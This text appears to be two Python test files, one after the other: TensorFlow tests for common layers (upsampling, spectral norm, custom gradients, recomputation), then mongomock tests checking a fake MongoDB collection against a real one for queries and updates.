[batch, height * stride[0], width * stride[1], output_filters],
self.evaluate(upsampled_output_shape))
@tf.contrib.eager.run_test_in_graph_and_eager_modes()
def testCycleGANUpsampleConv2dTranspose(self):
batch = 8
height = 32
width = 32
num_channels = 3
output_filters = 10
stride = [2, 3] # we want height to be x2 and width to be x3
random_input = np.random.rand(batch, height, width, num_channels).astype(
np.float32)
# conv2d_transpose is a little tricky.
# height_new = (height_old - 1) * stride + kernel - 2*padding - correction
# here kernel = 3, padding = 0, correction = 1
upsampled_height = (height - 1) * stride[0] + 3 - 2*0 - 1
upsampled_width = (width - 1) * stride[1] + 3 - 2*0 - 1
upsampled_output = common_layers.cyclegan_upsample(random_input,
output_filters, stride,
"conv2d_transpose")
upsampled_output_shape = tf.shape(upsampled_output)
self.evaluate(tf.global_variables_initializer())
self.assertAllEqual(
[batch, upsampled_height, upsampled_width, output_filters],
self.evaluate(upsampled_output_shape))
def testSpectralNorm(self):
# Test that after 20 calls to apply_spectral_norm, the spectral
# norm of the normalized matrix is close to 1.0
with tf.Graph().as_default():
weights = tf.get_variable("w", dtype=tf.float32, shape=[2, 3, 50, 100])
weights = tf.multiply(weights, 10.0)
normed_weight, assign_op = common_layers.apply_spectral_norm(weights)
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
for _ in range(20):
sess.run(assign_op)
normed_weight, assign_op = common_layers.apply_spectral_norm(
weights)
normed_weight = sess.run(normed_weight).reshape(-1, 100)
_, s, _ = np.linalg.svd(normed_weight)
self.assertTrue(np.allclose(s[0], 1.0, rtol=0.1))
class FnWithCustomGradTest(tf.test.TestCase):
def testCorrectness(self):
w = tf.random_uniform([6, 10])
def fn(a, b, c):
return tf.layers.dense(
a,
10,
use_bias=False,
kernel_initializer=lambda shape, dtype, partition_info: w
) + tf.matmul(b, c)
def grad_fn(inputs, variables, outputs, grad_outputs):
outputs = outputs[0]
grad_outputs = grad_outputs[0]
grad_inputs = tf.gradients(outputs, inputs, grad_ys=grad_outputs)
grad_vars = tf.gradients(outputs, variables, grad_ys=grad_outputs)
return grad_inputs, grad_vars
custom_fn = common_layers.fn_with_custom_grad(grad_fn)(fn)
a = tf.random_uniform([11, 6])
b = tf.random_uniform([11, 7])
c = tf.random_uniform([7, 10])
out = fn(a, b, c)
custom_out = custom_fn(a, b, c)
self.assertEqual(out.get_shape().as_list(),
custom_out.get_shape().as_list())
loss = tf.reduce_mean(out)
custom_loss = tf.reduce_mean(custom_out)
grads = tf.gradients(loss, [a, b, c] + [tf.trainable_variables()[0]])
custom_grads = tf.gradients(custom_loss,
[a, b, c] + [tf.trainable_variables()[1]])
with self.test_session() as sess:
sess.run(tf.global_variables_initializer())
out_val, custom_out_val, grads_val, custom_grads_val = sess.run(
[out, custom_out, grads, custom_grads])
self.assertAllClose(out_val, custom_out_val)
for g1, g2 in zip(grads_val, custom_grads_val):
self.assertAllClose(g1, g2)
def testCustomGrad(self):
def fn(a, b, c):
return tf.layers.dense(a, 10, use_bias=False) + tf.matmul(b, c)
def grad_fn(inputs, variables, unused_outputs, unused_grad_outputs):
grad_inputs = [tf.ones_like(t) * (i + 1.) for i, t in enumerate(inputs)]
grad_vars = [
tf.ones_like(t) * (i + len(inputs) + 1.)
for i, t in enumerate(variables)
]
return grad_inputs, grad_vars
a = tf.random_uniform([11, 6])
b = tf.random_uniform([11, 7])
c = tf.random_uniform([7, 10])
w = tf.random_uniform([6, 10])
out = common_layers.fn_with_custom_grad(grad_fn)(fn)(a, b, c)
loss = tf.reduce_mean(out)
grads = tf.gradients(loss, [a, b, c, tf.trainable_variables()[0]])
expected_grads = [
tf.ones_like(t) * (i + 1.) for i, t in enumerate([a, b, c, w])
]
with self.test_session() as sess:
sess.run(tf.global_variables_initializer())
g_val, eg_val = sess.run([grads, expected_grads])
for g1, g2 in zip(g_val, eg_val):
self.assertAllClose(g1, g2)
class RecomputeTest(tf.test.TestCase):
def testRecompute(self):
def layer(x, name=None):
with tf.variable_scope(name, default_name="layer"):
x = tf.contrib.layers.layer_norm(x)
x = tf.layers.conv1d(
x,
10,
1,
use_bias=False,
kernel_initializer=tf.constant_initializer(42.42))
x = tf.nn.relu(x)
return x
def fn(x):
out = x
for _ in range(3):
out = layer(out)
return out
@common_layers.recompute_grad
def fn_recompute(x):
return fn(x)
x = tf.random_uniform((3, 1, 3))
recompute_vars = None
with tf.variable_scope("recompute") as vs:
out1 = tf.reduce_sum(fn_recompute(x))
recompute_vars = vs.trainable_variables()
reg_vars = None
with tf.variable_scope("regular") as vs:
out2 = tf.reduce_sum(fn(x))
reg_vars = vs.trainable_variables()
grad1 = tf.gradients(out1, recompute_vars)
grad2 = tf.gradients(out2, reg_vars)
with self.test_session() as sess:
sess.run(tf.global_variables_initializer())
outs = sess.run([out1, out2, grad1, grad2])
self.assertAllClose(outs[0], outs[1])
for g1, g2 in zip(outs[2], outs[3]):
self.assertAllClose(g1, g2)
if __name__ == "__main__":
tf.test.main()
|
|
import copy
import time
import itertools
import re
import platform
import sys
from .utils import TestCase, skipIf, DBRef
import mongomock
from mongomock import Database
try:
import pymongo
from pymongo import Connection as PymongoConnection
from pymongo import MongoClient as PymongoClient
from bson.objectid import ObjectId
_HAVE_PYMONGO = True
except ImportError:
from mongomock.object_id import ObjectId
_HAVE_PYMONGO = False
try:
import execjs
from bson.code import Code
from bson.son import SON
_HAVE_MAP_REDUCE = True
except ImportError:
_HAVE_MAP_REDUCE = False
from tests.multicollection import MultiCollection
class InterfaceTest(TestCase):
def test__can_create_db_without_path(self):
conn = mongomock.Connection()
self.assertIsNotNone(conn)
def test__can_create_db_without_path(self):
conn = mongomock.Connection('mongodb://localhost')
self.assertIsNotNone(conn)
class DatabaseGettingTest(TestCase):
def setUp(self):
super(DatabaseGettingTest, self).setUp()
self.conn = mongomock.Connection()
def test__getting_database_via_getattr(self):
db1 = self.conn.some_database_here
db2 = self.conn.some_database_here
self.assertIs(db1, db2)
self.assertIs(db1, self.conn['some_database_here'])
self.assertIsInstance(db1, Database)
self.assertIs(db1.connection, self.conn) # 'connection' is an attribute of pymongo Database
self.assertIs(db2.connection, self.conn)
def test__getting_database_via_getitem(self):
db1 = self.conn['some_database_here']
db2 = self.conn['some_database_here']
self.assertIs(db1, db2)
self.assertIs(db1, self.conn.some_database_here)
self.assertIsInstance(db1, Database)
def test__drop_database(self):
db = self.conn.a
col = db.a
r = col.insert({"aa": "bb"})
qr = col.find({"_id": r})
self.assertEqual(qr.count(), 1)
self.conn.drop_database("a")
qr = col.find({"_id": r})
self.assertEqual(qr.count(), 0)
db = self.conn.a
col = db.a
r = col.insert({"aa": "bb"})
qr = col.find({"_id": r})
self.assertEqual(qr.count(), 1)
self.conn.drop_database(db)
qr = col.find({"_id": r})
self.assertEqual(qr.count(), 0)
def test__alive(self):
self.assertTrue(self.conn.alive())
def test__dereference(self):
db = self.conn.a
colA = db.a
to_insert = {"_id": "a", "aa": "bb"}
r = colA.insert(to_insert)
a = db.dereference(DBRef("a", "a", db.name))
self.assertEquals(to_insert, a)
@skipIf(not _HAVE_PYMONGO,"pymongo not installed")
class _CollectionComparisonTest(TestCase):
"""Compares a fake collection with the real mongo collection implementation via cross-comparison."""
def setUp(self):
super(_CollectionComparisonTest, self).setUp()
self.fake_conn = self._get_mongomock_connection_class()()
self.mongo_conn = self._connect_to_local_mongodb()
self.db_name = "mongomock___testing_db"
self.collection_name = "mongomock___testing_collection"
self.mongo_conn[self.db_name][self.collection_name].remove()
self.cmp = MultiCollection({
"fake" : self.fake_conn[self.db_name][self.collection_name],
"real": self.mongo_conn[self.db_name][self.collection_name],
})
def _connect_to_local_mongodb(self, num_retries=60):
"Performs retries on connection refused errors (for travis-ci builds)"
connection_class = self._get_real_connection_class()
for retry in range(num_retries):
if retry > 0:
time.sleep(0.5)
try:
return connection_class()
except pymongo.errors.ConnectionFailure as e:
if retry == num_retries - 1:
raise
if "connection refused" not in e.message.lower():
raise
class _MongoClientMixin(object):
def _get_real_connection_class(self):
return PymongoClient
def _get_mongomock_connection_class(self):
return mongomock.MongoClient
class _PymongoConnectionMixin(object):
def _get_real_connection_class(self):
return PymongoConnection
def _get_mongomock_connection_class(self):
return mongomock.Connection
class _CollectionTest(_CollectionComparisonTest):
def test__find_is_empty(self):
self.cmp.do.remove()
self.cmp.compare.find()
def test__inserting(self):
self.cmp.do.remove()
data = {"a" : 1, "b" : 2, "c" : "data"}
self.cmp.do.insert(data)
self.cmp.compare.find() # single document, no need to ignore order
def test__bulk_insert(self):
objs = [{"a" : 2, "b" : {"c" : 3}}, {"c" : 5}, {"d" : 7}]
results_dict = self.cmp.do.insert(objs)
for results in results_dict.values():
self.assertEquals(len(results), len(objs))
self.assertEquals(len(set(results)), len(results), "Returned object ids not unique!")
self.cmp.compare_ignore_order.find()
def test__save(self):
self.cmp.do.insert({"_id" : "b"}) #add an item with a non ObjectId _id first.
self.cmp.do.save({"_id":ObjectId(), "someProp":1}, safe=True)
self.cmp.compare_ignore_order.find()
def test__insert_object_id_as_dict(self):
self.cmp.do.remove()
doc_ids = [
# simple top-level dictionary
{'A': 1},
# dict with value as list
{'A': [1, 2, 3]},
# dict with value as dict
{'A': {'sub': {'subsub': 3}}}
]
for doc_id in doc_ids:
_id = self.cmp.do.insert({'_id': doc_id, 'a': 1})
self.assertEqual(_id['fake'], _id['real'])
self.assertEqual(_id['fake'], doc_id)
self.assertEqual(_id['real'], doc_id)
self.assertEqual(type(_id['fake']), type(_id['real']))
self.cmp.compare.find({'_id': doc_id})
docs = self.cmp.compare.find_one({'_id': doc_id})
self.assertEqual(docs['fake']['_id'], doc_id)
self.assertEqual(docs['real']['_id'], doc_id)
self.cmp.do.remove({'_id': doc_id})
def test__count(self):
self.cmp.compare.count()
self.cmp.do.insert({"a" : 1})
self.cmp.compare.count()
def test__find_one(self):
id1 = self.cmp.do.insert({"_id":"id1", "name" : "new"})
self.cmp.compare.find_one({"_id" : "id1"})
self.cmp.do.insert({"_id":"id2", "name" : "another new"})
self.cmp.compare.find_one({"_id" : "id2"}, {"_id":1})
self.cmp.compare.find_one("id2", {"_id":1})
def test__find_one_no_args(self):
self.cmp.do.insert({"_id": "new_obj", "field": "value"})
self.cmp.compare.find_one()
def test__find_by_attributes(self):
id1 = ObjectId()
self.cmp.do.insert({"_id":id1, "name" : "new"})
self.cmp.do.insert({"name" : "another new"})
self.cmp.compare_ignore_order.find()
self.cmp.compare.find({"_id" : id1})
def test__find_by_document(self):
self.cmp.do.insert({"name" : "new", "doc": {"key": "val"}})
self.cmp.do.insert({"name" : "another new"})
self.cmp.compare_ignore_order.find()
self.cmp.compare.find({"doc": {"key": "val"}})
def test__find_by_attributes_return_fields(self):
id1 = ObjectId()
id2 = ObjectId()
self.cmp.do.insert({"_id":id1, "name" : "new", "someOtherProp":2})
self.cmp.do.insert({"_id":id2, "name" : "another new"})
self.cmp.compare_ignore_order.find({},{"_id":0}) #test exclusion of _id
self.cmp.compare_ignore_order.find({},{"_id":1,"someOtherProp":1}) #test inclusion
self.cmp.compare_ignore_order.find({},{"_id":0,"someOtherProp":0}) #test exclusion
self.cmp.compare_ignore_order.find({},{"_id":0,"someOtherProp":1}) #test mixed _id:0
self.cmp.compare_ignore_order.find({},{"someOtherProp":0}) #test no _id, otherProp:0
self.cmp.compare_ignore_order.find({},{"someOtherProp":1}) #test no _id, otherProp:1
self.cmp.compare.find({"_id" : id1},{"_id":0}) #test exclusion of _id
self.cmp.compare.find({"_id" : id1},{"_id":1,"someOtherProp":1}) #test inclusion
self.cmp.compare.find({"_id" : id1},{"_id":0,"someOtherProp":0}) #test exclusion
self.cmp.compare.find({"_id" : id1},{"_id":0,"someOtherProp":1}) #test mixed _id:0
self.cmp.compare.find({"_id" : id1},{"someOtherProp":0}) #test no _id, otherProp:0
self.cmp.compare.find({"_id" : id1},{"someOtherProp":1}) #test no _id, otherProp:1
def test__find_by_dotted_attributes(self):
"""Test seaching with dot notation."""
green_bowler = {
'name': 'bob',
'hat': {
'color': 'green',
'type': 'bowler'}}
red_bowler = {
'name': 'sam',
'hat': {
'color': 'red',
'type': 'bowler'}}
self.cmp.do.insert(green_bowler)
self.cmp.do.insert(red_bowler)
self.cmp.compare_ignore_order.find()
self.cmp.compare_ignore_order.find({"name" : "sam"})
self.cmp.compare_ignore_order.find({'hat.color': 'green'})
self.cmp.compare_ignore_order.find({'hat.type': 'bowler'})
self.cmp.compare.find({
'hat.color': 'red',
'hat.type': 'bowler'
})
self.cmp.compare.find({
'name': 'bob',
'hat.color': 'red',
'hat.type': 'bowler'
})
self.cmp.compare.find({'hat': 'a hat'})
self.cmp.compare.find({'hat.color.cat': 'red'})
def test__find_empty_array_field(self):
#See #90
self.cmp.do.insert({'array_field' : []})
self.cmp.compare.find({'array_field' : []})
def test__find_non_empty_array_field(self):
#See #90
self.cmp.do.insert({'array_field' : [['abc']]})
self.cmp.do.insert({'array_field' : ['def']})
self.cmp.compare.find({'array_field' : ['abc']})
self.cmp.compare.find({'array_field' : [['abc']]})
self.cmp.compare.find({'array_field' : 'def'})
self.cmp.compare.find({'array_field' : ['def']})
def test__find_by_objectid_in_list(self):
#See #79
self.cmp.do.insert({'_id': 'x', 'rel_id' : [ObjectId('52d669dcad547f059424f783')]})
self.cmp.compare.find({'rel_id':ObjectId('52d669dcad547f059424f783')})
def test__find_subselect_in_list(self):
#See #78
self.cmp.do.insert({'_id': 'some_id', 'a': [ {'b': 1, 'c': 2} ]})
self.cmp.compare.find_one({'a.b': 1})
def test__find_by_regex_object(self):
"""Test searching with regular expression objects."""
bob = {'name': 'bob'}
sam = {'name': 'sam'}
self.cmp.do.insert(bob)
self.cmp.do.insert(sam)
self.cmp.compare_ignore_order.find()
regex = re.compile('bob|sam')
self.cmp.compare_ignore_order.find({"name" : regex})
regex = re.compile('bob|notsam')
self.cmp.compare_ignore_order.find({"name" : regex})
def test__find_by_regex_string(self):
"""Test searching with regular expression string."""
bob = {'name': 'bob'}
sam = {'name': 'sam'}
self.cmp.do.insert(bob)
self.cmp.do.insert(sam)
self.cmp.compare_ignore_order.find()
self.cmp.compare_ignore_order.find({"name": {'$regex': 'bob|sam'}})
self.cmp.compare_ignore_order.find({'name': {'$regex': 'bob|notsam'}})
def test__find_in_array_by_regex_object(self):
"""Test searching inside array with regular expression object."""
bob = {'name': 'bob', 'text': ['abcd', 'cde']}
sam = {'name': 'sam', 'text': ['bde']}
self.cmp.do.insert(bob)
self.cmp.do.insert(sam)
regex = re.compile('^a')
self.cmp.compare_ignore_order.find({"text": regex})
regex = re.compile('e$')
self.cmp.compare_ignore_order.find({"text": regex})
regex = re.compile('bde|cde')
self.cmp.compare_ignore_order.find({"text": regex})
def test__find_in_array_by_regex_string(self):
"""Test searching inside array with regular expression string"""
bob = {'name': 'bob', 'text': ['abcd', 'cde']}
sam = {'name': 'sam', 'text': ['bde']}
self.cmp.do.insert(bob)
self.cmp.do.insert(sam)
self.cmp.compare_ignore_order.find({"text": {'$regex': '^a'}})
self.cmp.compare_ignore_order.find({"text": {'$regex': 'e$'}})
self.cmp.compare_ignore_order.find({"text": {'$regex': 'bcd|cde'}})
def test__find_by_regex_string_on_absent_field_dont_break(self):
"""Test searching on absent field with regular expression string dont break"""
bob = {'name': 'bob'}
sam = {'name': 'sam'}
self.cmp.do.insert(bob)
self.cmp.do.insert(sam)
self.cmp.compare_ignore_order.find({"text": {'$regex': 'bob|sam'}})
def test__find_by_elemMatch(self):
self.cmp.do.insert({"field": [{"a": 1, "b": 2}, {"c": 3, "d": 4}]})
self.cmp.do.insert({"field": [{"a": 1, "b": 4}, {"c": 3, "d": 8}]})
self.cmp.do.insert({"field": "nonlist"})
self.cmp.do.insert({"field": 2})
self.cmp.compare.find({"field": {"$elemMatch": {"b": 1}}})
self.cmp.compare_ignore_order.find({"field": {"$elemMatch": {"a": 1}}})
self.cmp.compare.find({"field": {"$elemMatch": {"b": {"$gt": 3}}}})
def test__find_in_array(self):
self.cmp.do.insert({"field": [{"a": 1, "b": 2}, {"c": 3, "d": 4}]})
self.cmp.compare.find({"field.0.a": 1})
self.cmp.compare.find({"field.0.b": 2})
self.cmp.compare.find({"field.1.c": 3})
self.cmp.compare.find({"field.1.d": 4})
self.cmp.compare.find({"field.0": {"$exists" : True}})
self.cmp.compare.find({"field.0": {"$exists" : False}})
self.cmp.compare.find({"field.0.a": {"$exists" : True}})
self.cmp.compare.find({"field.0.a": {"$exists" : False}})
self.cmp.compare.find({"field.1.a": {"$exists" : True}})
self.cmp.compare.find({"field.1.a": {"$exists" : False}})
self.cmp.compare.find({"field.0.a": {"$exists" : True}, "field.1.a": {"$exists" : False}})
def test__find_notequal(self):
"""Test searching with operators other than equality."""
bob = {'_id': 1, 'name': 'bob'}
sam = {'_id': 2, 'name': 'sam'}
a_goat = {'_id': 3, 'goatness': 'very'}
self.cmp.do.insert([bob, sam, a_goat])
self.cmp.compare_ignore_order.find()
self.cmp.compare_ignore_order.find({'name': {'$ne': 'bob'}})
self.cmp.compare_ignore_order.find({'goatness': {'$ne': 'very'}})
self.cmp.compare_ignore_order.find({'goatness': {'$ne': 'not very'}})
self.cmp.compare_ignore_order.find({'snakeness': {'$ne': 'very'}})
def test__find_notequal(self):
"""Test searching for None."""
bob = {'_id': 1, 'name': 'bob', 'sheepness':{'sometimes':True}}
sam = {'_id': 2, 'name': 'sam', 'sheepness':{'sometimes':True}}
a_goat = {'_id': 3, 'goatness': 'very', 'sheepness':{}}
self.cmp.do.insert([bob, sam, a_goat])
self.cmp.compare_ignore_order.find({'goatness': None})
self.cmp.compare_ignore_order.find({'sheepness.sometimes': None})
def test__find_not(self):
bob = {'_id': 1, 'name': 'bob'}
sam = {'_id': 2, 'name': 'sam'}
self.cmp.do.insert([bob, sam])
self.cmp.compare_ignore_order.find()
self.cmp.compare_ignore_order.find({'name': {'$not': {'$ne': 'bob'}}})
self.cmp.compare_ignore_order.find({'name': {'$not': {'$ne': 'sam'}}})
self.cmp.compare_ignore_order.find({'name': {'$not': {'$ne': 'dan'}}})
def test__find_compare(self):
self.cmp.do.insert(dict(noise = "longhorn"))
for x in range(10):
self.cmp.do.insert(dict(num = x, sqrd = x * x))
self.cmp.compare_ignore_order.find({'sqrd':{'$lte':4}})
self.cmp.compare_ignore_order.find({'sqrd':{'$lt':4}})
self.cmp.compare_ignore_order.find({'sqrd':{'$gte':64}})
self.cmp.compare_ignore_order.find({'sqrd':{'$gte':25, '$lte':36}})
def test__find_sets(self):
single = 4
even = [2, 4, 6, 8]
prime = [2, 3, 5, 7]
self.cmp.do.insert([
dict(x = single),
dict(x = even),
dict(x = prime)])
self.cmp.compare_ignore_order.find({'x':{'$in':[7, 8]}})
self.cmp.compare_ignore_order.find({'x':{'$in':[4, 5]}})
self.cmp.compare_ignore_order.find({'x':{'$nin':[2, 5]}})
self.cmp.compare_ignore_order.find({'x':{'$all':[2, 5]}})
self.cmp.compare_ignore_order.find({'x':{'$all':[7, 8]}})
self.cmp.compare_ignore_order.find({'x':2})
self.cmp.compare_ignore_order.find({'x':4})
self.cmp.compare_ignore_order.find({'$or':[{'x':4}, {'x':2}]})
self.cmp.compare_ignore_order.find({'$or':[{'x':4}, {'x':7}]})
self.cmp.compare_ignore_order.find({'$and':[{'x':2}, {'x':7}]})
def test__find_and_modify_remove(self):
self.cmp.do.insert([{"a": x} for x in range(10)])
self.cmp.do.find_and_modify({"a": 2}, remove=True)
self.cmp.compare_ignore_order.find()
def test__find_sort_list(self):
self.cmp.do.remove()
for data in ({"a" : 1, "b" : 3, "c" : "data1"},
{"a" : 2, "b" : 2, "c" : "data3"},
{"a" : 3, "b" : 1, "c" : "data2"}):
self.cmp.do.insert(data)
self.cmp.compare.find(sort = [("a", 1), ("b", -1)])
self.cmp.compare.find(sort = [("b", 1), ("a", -1)])
self.cmp.compare.find(sort = [("b", 1), ("a", -1), ("c", 1)])
def test__find_sort_list_empty_order(self):
self.cmp.do.remove()
for data in ({"a": 1},
{"a": 2, "b": -2},
{"a": 3, "b": 4}):
self.cmp.do.insert(data)
self.cmp.compare.find(sort=[("b", 1)])
self.cmp.compare.find(sort=[("b", -1)])
def test__find_sort_list_nested_doc(self):
self.cmp.do.remove()
for data in ({"root": {"a" : 1, "b" : 3, "c" : "data1"}},
{"root": {"a" : 2, "b" : 2, "c" : "data3"}},
{"root": {"a" : 3, "b" : 1, "c" : "data2"}}):
self.cmp.do.insert(data)
self.cmp.compare.find(sort = [("root.a", 1), ("root.b", -1)])
self.cmp.compare.find(sort = [("root.b", 1), ("root.a", -1)])
self.cmp.compare.find(sort = [("root.b", 1), ("root.a", -1), ("root.c", 1)])
def test__find_sort_list_nested_list(self):
self.cmp.do.remove()
for data in ({"root": [{"a" : 1, "b" : 3, "c" : "data1"}]},
{"root": [{"a" : 2, "b" : 2, "c" : "data3"}]},
{"root": [{"a" : 3, "b" : 1, "c" : "data2"}]}):
self.cmp.do.insert(data)
self.cmp.compare.find(sort = [("root.0.a", 1), ("root.0.b", -1)])
self.cmp.compare.find(sort = [("root.0.b", 1), ("root.0.a", -1)])
self.cmp.compare.find(sort = [("root.0.b", 1), ("root.0.a", -1), ("root.0.c", 1)])
def test__find_limit(self):
self.cmp.do.remove()
for data in ({"a" : 1, "b" : 3, "c" : "data1"},
{"a" : 2, "b" : 2, "c" : "data3"},
{"a" : 3, "b" : 1, "c" : "data2"}):
self.cmp.do.insert(data)
self.cmp.compare.find(limit=2, sort = [("a", 1), ("b", -1)])
self.cmp.compare.find(limit=0, sort = [("a", 1), ("b", -1)]) #pymongo limit defaults to 0, returning everything
def test__as_class(self):
class MyDict(dict): pass
self.cmp.do.remove()
self.cmp.do.insert({"a": 1, "b": {"ba": 3, "bb": 4, "bc": [ {"bca": 5 } ] }})
self.cmp.compare.find({}, as_class=MyDict)
self.cmp.compare.find({"a": 1}, as_class=MyDict)
def test__return_only_selected_fields(self):
self.cmp.do.insert({'name':'Chucky', 'type':'doll', 'model':'v6'})
self.cmp.compare_ignore_order.find({'name':'Chucky'}, fields = ['type'])
def test__return_only_selected_fields_no_id(self):
self.cmp.do.insert({'name':'Chucky', 'type':'doll', 'model':'v6'})
self.cmp.compare_ignore_order.find({'name':'Chucky'}, fields = {'type' : 1, '_id' : 0})
def test__return_only_selected_fields_nested_field_found(self):
self.cmp.do.insert({'name':'Chucky', 'properties' : {'type':'doll', 'model':'v6'}})
self.cmp.compare_ignore_order.find({'name':'Chucky'}, fields = ['properties.type'])
def test__return_only_selected_fields_nested_field_not_found(self):
self.cmp.do.insert({'name':'Chucky', 'properties' : {'type':'doll', 'model':'v6'}})
self.cmp.compare_ignore_order.find({'name':'Chucky'}, fields = ['properties.color'])
def test__return_only_selected_fields_nested_field_found_no_id(self):
self.cmp.do.insert({'name':'Chucky', 'properties' : {'type':'doll', 'model':'v6'}})
self.cmp.compare_ignore_order.find({'name':'Chucky'}, fields = {'properties.type' : 1, '_id' : 0})
def test__return_only_selected_fields_nested_field_not_found_no_id(self):
self.cmp.do.insert({'name':'Chucky', 'properties' : {'type':'doll', 'model':'v6'}})
self.cmp.compare_ignore_order.find({'name':'Chucky'}, fields = {'properties.color' : 1, '_id' : 0})
def test__exclude_selected_fields(self):
self.cmp.do.insert({'name':'Chucky', 'type':'doll', 'model':'v6'})
self.cmp.compare_ignore_order.find({'name':'Chucky'}, fields = {'type' : 0})
def test__exclude_selected_fields_including_id(self):
self.cmp.do.insert({'name':'Chucky', 'type':'doll', 'model':'v6'})
self.cmp.compare_ignore_order.find({'name':'Chucky'}, fields = {'type' : 0, '_id' : 0})
def test__exclude_all_fields_including_id(self):
self.cmp.do.insert({'name':'Chucky', 'type':'doll'})
self.cmp.compare.find({'name':'Chucky'}, fields = {'type' : 0, '_id' : 0, 'name' : 0})
def test__exclude_selected_nested_fields(self):
self.cmp.do.insert({'name':'Chucky', 'properties' : {'type':'doll', 'model':'v6'}})
self.cmp.compare_ignore_order.find({'name':'Chucky'}, fields = {'properties.type' : 0})
def test__exclude_all_selected_nested_fields(self):
self.cmp.do.insert({'name':'Chucky', 'properties' : {'type':'doll', 'model':'v6'}})
self.cmp.compare_ignore_order.find({'name':'Chucky'}, fields = {'properties.type' : 0, 'properties.model' : 0})
def test__default_fields_to_id_if_empty(self):
self.cmp.do.insert({'name':'Chucky', 'type':'doll', 'model':'v6'})
self.cmp.compare_ignore_order.find({'name':'Chucky'}, fields = [])
def test__remove(self):
"""Test the remove method."""
self.cmp.do.insert({"value" : 1})
self.cmp.compare_ignore_order.find()
self.cmp.do.remove()
self.cmp.compare.find()
self.cmp.do.insert([
{'name': 'bob'},
{'name': 'sam'},
])
self.cmp.compare_ignore_order.find()
self.cmp.do.remove({'name': 'bob'})
self.cmp.compare_ignore_order.find()
self.cmp.do.remove({'name': 'notsam'})
self.cmp.compare.find()
self.cmp.do.remove({'name': 'sam'})
self.cmp.compare.find()
def test__update(self):
doc = {"a" : 1}
self.cmp.do.insert(doc)
new_document = {"new_attr" : 2}
self.cmp.do.update({"a" : 1}, new_document)
self.cmp.compare_ignore_order.find()
def test__set(self):
"""Tests calling update with $set members."""
self.cmp.do.update({'_id':42}, {'$set': {'some': 'thing'}}, upsert=True)
self.cmp.compare.find({'_id' : 42})
self.cmp.do.insert({'name': 'bob'})
self.cmp.do.update({'name': 'bob'}, {'$set': {'hat': 'green'}})
self.cmp.compare.find({'name' : 'bob'})
self.cmp.do.update({'name': 'bob'}, {'$set': {'hat': 'red'}})
self.cmp.compare.find({'name': 'bob'})
def test__unset(self):
"""Tests calling update with $set members."""
self.cmp.do.update({'name': 'bob'}, {'a': 'aaa'}, upsert=True)
self.cmp.compare.find({'name' : 'bob'})
self.cmp.do.update({'name': 'bob'}, {'$unset': {'a': 0}})
self.cmp.compare.find({'name' : 'bob'})
self.cmp.do.update({'name': 'bob'}, {'a': 'aaa'}, upsert=True)
self.cmp.compare.find({'name' : 'bob'})
self.cmp.do.update({'name': 'bob'}, {'$unset': {'a': 1}})
self.cmp.compare.find({'name' : 'bob'})
self.cmp.do.update({'name': 'bob'}, {'a': 'aaa'}, upsert=True)
self.cmp.compare.find({'name' : 'bob'})
self.cmp.do.update({'name': 'bob'}, {'$unset': {'a': ""}})
self.cmp.compare.find({'name' : 'bob'})
self.cmp.do.update({'name': 'bob'}, {'a': 'aaa'}, upsert=True)
self.cmp.compare.find({'name' : 'bob'})
self.cmp.do.update({'name': 'bob'}, {'$unset': {'a': True}})
self.cmp.compare.find({'name' : 'bob'})
self.cmp.do.update({'name': 'bob'}, {'a': 'aaa'}, upsert=True)
self.cmp.compare.find({'name' : 'bob'})
self.cmp.do.update({'name': 'bob'}, {'$unset': {'a': False}})
self.cmp.compare.find({'name' : 'bob'})
def test__set_upsert(self):
self.cmp.do.remove()
self.cmp.do.update({"name": "bob"}, {"$set": {"age": 1}}, True)
self.cmp.compare.find()
self.cmp.do.update({"name": "alice"}, {"$set": {"age": 1}}, True)
self.cmp.compare_ignore_order.find()
def test__set_subdocuments(self):
"""Tests using $set for setting subdocument fields"""
if isinstance(self, _MongoClientMixin):
self.skipTest("MongoClient does not allow setting subdocuments on existing non-documents")
self.cmp.do.insert({'name': 'bob', 'data1': 1, 'subdocument': {'a': {'b': {'c': 20}}}})
self.cmp.do.update({'name': 'bob'}, {'$set': {'data1.field1': 11}})
self.cmp.compare.find()
self.cmp.do.update({'name': 'bob'}, {'$set': {'data2.field1': 21}})
self.cmp.compare.find()
self.cmp.do.update({'name': 'bob'}, {'$set': {'subdocument.a.b': 21}})
self.cmp.compare.find()
def test__set_subdocuments_positional(self):
self.cmp.do.insert({'name': 'bob', 'subdocs': [
{'id': 1, 'name': 'foo'},
{'id': 2, 'name': 'bar'}
]})
self.cmp.do.update({'name': 'bob', 'subdocs.id': 2},
{'$set': {'subdocs.$': {'id': 3, 'name': 'baz'}}})
self.cmp.compare.find()
def test__inc(self):
self.cmp.do.remove()
self.cmp.do.insert({'name': 'bob'})
for i in range(3):
self.cmp.do.update({'name':'bob'}, {'$inc': {'count':1}})
self.cmp.compare.find({'name': 'bob'})
def test__inc_upsert(self):
self.cmp.do.remove()
for i in range(3):
self.cmp.do.update({'name':'bob'}, {'$inc': {'count':1}}, True)
self.cmp.compare.find({'name': 'bob'})
def test__inc_subdocument(self):
self.cmp.do.remove()
self.cmp.do.insert({'name': 'bob', 'data': {'age': 0}})
self.cmp.do.update({'name':'bob'}, {'$inc': {'data.age': 1}})
self.cmp.compare.find()
self.cmp.do.update({'name':'bob'}, {'$inc': {'data.age2': 1}})
self.cmp.compare.find()
def test__inc_subdocument_positional(self):
self.cmp.do.remove()
self.cmp.do.insert({'name': 'bob', 'data': [{'age': 0}, {'age': 1}]})
self.cmp.do.update({'name': 'bob', 'data': {'$elemMatch': {'age': 0}}},
{'$inc': {'data.$.age': 1}})
self.cmp.compare.find()
def test__setOnInsert(self):
self.cmp.do.remove()
self.cmp.do.insert({'name': 'bob'})
self.cmp.do.update({'name': 'bob'}, {'$setOnInsert': {'age': 1}})
self.cmp.compare.find()
self.cmp.do.update({'name': 'ann'}, {'$setOnInsert': {'age': 1}})
self.cmp.compare.find()
def test__setOnInsert_upsert(self):
self.cmp.do.remove()
self.cmp.do.insert({'name': 'bob'})
self.cmp.do.update({'name': 'bob'}, {'$setOnInsert': {'age': 1}}, True)
self.cmp.compare.find()
self.cmp.do.update({'name': 'ann'}, {'$setOnInsert': {'age': 1}}, True)
self.cmp.compare.find()
def test__setOnInsert_subdocument(self):
self.cmp.do.remove()
self.cmp.do.insert({'name': 'bob', 'data': {'age': 0}})
self.cmp.do.update({'name': 'bob'}, {'$setOnInsert': {'data.age': 1}})
self.cmp.compare.find()
